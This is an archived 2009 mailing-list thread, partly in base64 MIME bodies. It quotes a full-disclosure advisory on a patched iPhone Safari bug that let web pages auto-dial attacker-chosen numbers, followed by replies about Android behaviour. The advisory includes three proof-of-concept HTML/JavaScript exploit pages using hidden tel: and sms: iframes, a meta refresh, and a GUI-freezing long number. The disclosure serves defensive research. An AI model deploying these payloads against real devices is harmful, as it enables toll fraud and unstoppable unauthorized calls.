ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
